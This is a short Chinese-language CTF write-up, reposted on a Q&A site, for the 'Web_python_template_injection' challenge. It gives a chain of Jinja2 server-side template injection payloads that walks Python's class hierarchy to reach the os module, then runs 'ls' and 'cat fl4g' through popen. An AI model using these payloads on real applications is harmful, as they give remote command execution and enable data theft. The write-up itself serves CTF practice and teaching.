当前位置:首页 > 编程笔记 > 正文
已解决

Web_python_template_injection SSTI printer方法

来自网友在路上 157857提问 提问时间:2023-10-07 13:53:46阅读次数: 57

最佳答案 问答题库578位专家为你答疑解惑

这题挺简单的 就是记录一下不同方法的rce

python_template_injection

ssti了

{{''.__class__.__mro__[2].__subclasses__()}}

然后用脚本跑可以知道是 71

{{''.__class__.__mro__[2].__subclasses__()[71]}}

然后直接 init

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__}}

 存在os

直接通过os rce 了

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}

查看全文

99%的人还看了

猜你感兴趣

版权申明

本文"Web_python_template_injection SSTI printer方法":http://eshow365.cn/6-16794-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!